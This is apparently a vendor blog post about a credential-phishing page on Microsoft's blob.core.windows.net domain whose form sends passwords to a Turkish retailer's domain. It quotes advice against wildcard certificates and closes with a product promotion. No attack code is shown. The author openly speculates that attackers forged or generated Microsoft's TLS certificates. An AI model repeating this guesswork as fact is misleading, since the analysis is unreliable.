A lot of interesting finds can be discovered on Twitter. A security researcher found a webpage on Microsoft.net for Office 365 that uses a TLS certificate which appears to be very suspicious.
What’s that *.blob.core.windows.net subdomain?
JavaScript code related to the page sends a user’s sensitive authentication credentials to kopcamveanya.com.
I decided to take the plunge and see what the website hosted through the kopcamveanya.com was all about. It appeared to be a Turkish retailer of some sort.
I plugged their “About” page into Google Translate, as I don’t understand Turkish.
I can only speculate as to what’s going on with Microsoft’s domain and the domain of this Turkish glass retailer. But most likely Microsoft is being impersonated by cyber attackers. Microsoft is one of the biggest tech companies in the world. Even if you prefer to use Macs or Linux, I can pretty much guarantee that you’ve directly used their software at some point. And we also use their software indirectly through platforms like Microsoft IIS web servers, Windows Server operating systems, and Microsoft Azure cloud servers. They may have started on the client frontend in the 80s with MS-DOS and Windows, but for decades they have had a significant presence on the backend too. Their 2018 revenue was about $110.36 billion USD, and they employ many of the top minds in the computing industry. I’m confident that they wouldn’t knowingly collaborate with cyber attackers, and would think they’re securing their TLS certificates and all of their public key infrastructures like Fort Knox.
But the only reasonable assumption here is that cyber attackers have indeed impersonated their TLS systems and domain. And the *.blob.core.windows.net subdomain may be one that cyber attackers have created themselves. They may have been able to maliciously acquire some windows.net TLS certificates to modify for their own nefarious purposes. But more likely, they were able to generate TLS certificates for *.blob.core.windows.net completely on their own.
The JavaScript on what’s likely the cyber attacker’s phishing webpage for credentials collection isn’t obfuscated at all, because we can clearly see that passwords that go through that form are being sent to an address with the kopcamveanya.com domain.
Is the Turkish ecommerce site for glass retailing a front for cyber crime? Why is an online store being delivered through plaintext HTTP? I’m not going to try to buy something to see if customer transaction data is sent through HTTPS. Perhaps it isn’t. Perhaps it is. It’s not worth the risk for me.
I think the more probable scenario is that the Turkish glass retailer’s site isn’t a front for cyber crime, the cyber attackers may have hijacked the kopcamveanya.com domain to route their data transmissions. I mean, come on! A web store that uses HTTP?
SSL/TLS Certificates and Their Prevalence on the Dark Web
Hopefully someone has reported this phishing incident to Microsoft.
The *.blob.core.windows.net subdomain in the cyber attackers’ TLS certificate marks it as a wildcard type. Any word can be used in the first part of the subdomain as * is a wildcard. It could be phishing.blob.core.windows.net, it could be fraud.blob.core.windows.net, it could be fooledya.blob.core.windows.net, it could be whatever you want.
Last October, David Bisson recommended that organizations cease using wildcard certificates. He wrote:
“Clearly, attackers are comfortable with using wildcard certificates for phishing emails attacks and other attacks. Fortunately, security controls and solutions can help block an attack. By putting these defenses in place, you increase the effort that a malicious actor must take to compromise your network. Your goal is to make compromising your network so expensive that cyber-criminals would rather focus their attention on someone else. As the saying goes: When a lion chases you, you don’t need to be the fastest runner; you just have to be faster than the person behind you.
You can make your organization more costly to exploit by avoiding wildcard certificates. Although wildcard certificates make business operations simpler, they provide tremendous opportunity to any cyber-criminal who compromises your webserver or steals a wildcard certificate’s private key.”
Maybe Microsoft got into the habit of using wildcard certificates and opened an exploit for cyber attackers who want to spoof their web apps and websites. As for the kopcamveanya.com website, there’s nothing about it that looks at all secure.
Get a 30 Day Free Trial of TLS Protect Cloud, Automated Certificate Management.
Related posts
- Domain Spoofing Is Still a Serious Threat for Online Retailers
- Venafi Retail Research: Will Holiday Shoppers be Duped By Look-alike Domains?
- The London Protocol Aims to Expose the Misuse of Machine Identities in Phishing Attacks
- Phishing Campaign Uses TLS Certificates to Impersonate Netflix and Steal Users’ Account Credentials